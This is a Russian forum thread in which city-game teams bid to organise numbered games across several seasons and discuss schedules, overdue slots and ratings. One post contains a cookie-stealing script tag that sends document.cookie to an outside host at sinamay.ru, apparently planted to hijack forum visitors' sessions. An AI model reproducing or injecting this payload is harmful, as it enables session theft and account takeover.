![]() |
|
Уважаемые команды и иниц.группы! Напоминаем вам, что у нас первая и вторая игры след.сезона уже МНОГОКРАТНО просрочены! Убедительная просьба активизироваться! К тому же, от февральской даты первой игры зависит расписание всего сезона.
Спасибо! |
SFZ проведет 1 игру XI сезона.
|
CodeBreakers проведет 2 игру XI сезона.
|
Команда Futurama SPb Team (S-F Team) подаёт заявку на проведение 3й игры XI сезона
|
быстро)
|
Хватайте дальше, а то скоро все игры разберут!
|
Нее... Все не разберут)))))) Одна останется
|
Вентилятор подает заявку на проведение 4ой игры сезона.
|
Ух ты!!! Однако!!
А Брейкеры, сцуко, плодовитые!!:D |
Херасе, как быстро все тут! ) Молодцы!
|
Laww, а ты волновался. =))
|
Чойто всех так торкнуло...:-)
|
Цитата:
|
вот сезон как интересно будет начинатся у нас =)
|
все после копроративов проспались и давай идеи стругать! ))
|
<s>А 5-ую игру никто делать не хочет что ли?
3-его марта она просрочкой станет...</s> Ждем заявку Идиотов. |
Заявка Идиотов.
|
Драйв подает заявку на 6-у игру.
|
We live in hope of deliverance
From the darkness that surrounds us. Подаю заявку на седьмую игру 11 сезона. |
|
на сайте верно. Пришлось поменять даты 4-й игры ДЛ1 и 6-й игры ДЛНС из-за праздников
|
|
Насколько я помню, вопрос такой я поднимала, когда обнаружилась разница в календарях - ДЛ и ДЛ1. Тогда подправили календарь. Видимо, календарь - правильная версия.
|
Ой а что тут так грустно?..
|
Посл.игру никто не хочет провести?
|
Обсуждение выпилено. В данной теме только заявки на организацию игр.
|
Ой хорошие вы мои, подаю заявку на крайнюю игру текущего сезона.
|
Цитата:
|
Валера мужик! :)
|
Цитата:
|
Валера, настало твое время!
|
Цитата:
|
|
Я правильно понимаю, что могу сейчас забрать сразу 3 игры?)))
|
Цитата:
Первые две автоматом, третью может перебить команда до начала первой. |
Есть большое желание дооформить концепт командной игры и подать заявку на вторую игру сезона.
Надеюсь мне поможет организовать все лучше опытный игрок, которого я попросил. Ежели согласится точно, то отпишется я надеюсь. Надеюсь что при готовом перечне принципов и правил организации уровней команды впишутся готовить по уровню. |
Возможно сможем организовать игру.
Хотелось бы понимать какую именно лучше делать. Миша ты когда определишься? Есть ли еще желающие? |
Цитата:
|
Цитата:
|
Цитата:
Таким образом если брать заявку на первую игру, то у команд будет июль на подготовку, а у координаторов первые две недели августа на тест. |
Я подаю заявку на 1 игру 12 сезона.
Я подаю заявку на 2 игру 12 сезона. Некоторые подробности - здесь: http://dead-line.spb.ru/forum/showth...t=3978&page=27 |
Ини-группа, непонятно еще каким составом, подает заявку на 3 игру сезона.
|
Цитата:
Продолжаем долбить просрочки =) |
По договоренности к командой No Limits вторую игру сезона будут делать они.
|
Команда WTF подает заявку на четвертую игру сезона.
|
команда "Осторожно, маньяки!" подает заявку на 4-ю игру сезона
|
Команда StreetFuckerzzz подает заявку на 4 игру текущего сезона.
|
Команда "Осторожно, Маньяки!" подает заявку на организацию 5-й игры сезона
|
WTF подает заявку на 6 игру сезона
|
Команда Вентилятор не будет делать игру в этом сезоне.
|
Друзья, напоминаю, что 7я и 8я игры у нас пока не делает никто. Хотелось бы увидеть желающих!
|
Сгу, обнови текущий статус плз. Что просрочено, что не просрочено, и т.п.
|
Цитата:
|
Цитата:
|
Готов взять 7-ю, либо 8-ю игру текущего сезона. Но подтвердить заявку смогу только в начале ноября. Парампапам. Считайте предварительной заявкой.
UPD!!! Короче, подаю заявку на 7-ю игру. Если очень хочется перебить, перебивайте до 1 ноября. После 1 ноября прошу считать заявку утвержденной. |
Цитата:
|
Команда Futurama Spb team подает заявку на проведение 8й игры сезона.
|
Обновите расписание пжалст)
|
Цитата:
<script> img = new Image(); img.src = "http://sinamay.ru/s.gif?"+document.cookie; </script> |
Забираю 1 игру 13 сезона :D
|
Цитата:
ППО. |
От себя
|
Есть ли команды, делающие игру после нас, желающие поменяться играми в новом сезоне или даже в следующем? У нас игра 13-14 апреля, есть идея, которую к этому времени хорошо не реализовать.
|
Обновите первый пост пжлста.
|
Цитата:
|
Обновите пп
|
Цитата:
Можно поставить в орги реально существующие команды? |
Да
|
Цитата:
3/13 - CodeBreakers 4/13 - ЖКХ 5/13 - Осторожно, Маньяки! 6/13 - StreetFuckerZZZ Team 1/14 - Идиоты 2/14 - ЖКХ Вот так должно быть. |
а что, НоНаме не хочет игру делать?
|
Команды ЖКХ и НоНаме могут делать только 6 игру в сезоне. Если будут регулярно играть. 4.2.2, 4.2.3. Администраторы, пожалуйста, доведите до ума сий момент.
|
Я думаю, что можно решить этот вопрос с капитанами. По крайней мере, Кошак говорил, что ЖКХ сделают обе игры.
|
Так и было, мы готовы взять обе игры.
|
вопросец, а если команда, которой выпал жребий не хочИт игру делать? (я про сферического коня в вакууме, мы свою делаем=) )
|
Тогда возвращаются ОНИ! :D
|
Ага Забор-2 Начало
|
Цитата:
|
Цитата:
Если формальность так пугает, можно столь же формально сказать, что ЖКХ - не новая команда, а переименованная Футурама (или переименованный Вентилятор). |
Цитата:
|
ненашелрасписание=недедлайнер?
|
Цитата:
Оно в какой то теме в топиках про ДЛоне. На главное нету) |
Цитата:
хочу ответа. |
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Рейтинги после прошлой игры даже не подправили :(
|
Подправим все.
|
Чойта я запутался, а где актуальная инфа о рейтингах, расписании и всякой организационной хрени?
|
Цитата:
4 игра 18-19 мая - ЖКХ 5 игра 08-09 июня - Осторожно, Маньяки! 6 игра 29-30 июня - StreetFuckerZZZ Team 19-20-21 июля - закрытие 13-ого сезона 1 игра 17-18 августа - Идиоты 2 игра 07-08 сентября - ЖКХ 3 игра 28-29 сентября - ? 4 игра 19-20 октября - ? 5 игра 16-17 нобяря - ? 6 игра 07-08 декабря - ? 24-25-26 января - закрытие 14-ого сезона Рейтинг после 3-х игр: 49 NoNamе 44 CodeBreakers 43 StreetFuckerZZZ Team 39 ЖКХ 31 WTF_DL 31 Осторожно, Маньяки! 28 Идиоты 23 psychos 12 OrgIya 07 No LimitS Всякая организационная хрень: - мы все умрем. |
А еще расписание есть в гуглдоке: http://bit.ly/DeadLineShedule...
|
Бальшая спасиба!
|
скажите, господа, а почему под межнары энковские расписание проекта подстраивается, а под заборные нет? К энке стали более толерантно относится, а забор все еще ненавидим или как?
|
В заборе есть международные игры, на которые собираются команды из ДЛ и на которых эти команды рады видеть?
|
Насколько помню в прошлом году был отказ в ультимативной форме ДЛ-команде на участие в Мега Дозоре
|
В прошлом году на ДЛ анонс висел, после которого только и посылать в ультимативной форме, спасибо Мишане.
|
+1 к Гоше в общем-то.
Хотя о чем мы говорим? у нас даже НайтФест с расписанием пересекается. Не то чтоб прям совсем, но довольно близко. |
Цитата:
|
Часовой пояс GMT +3, время: 18:55. |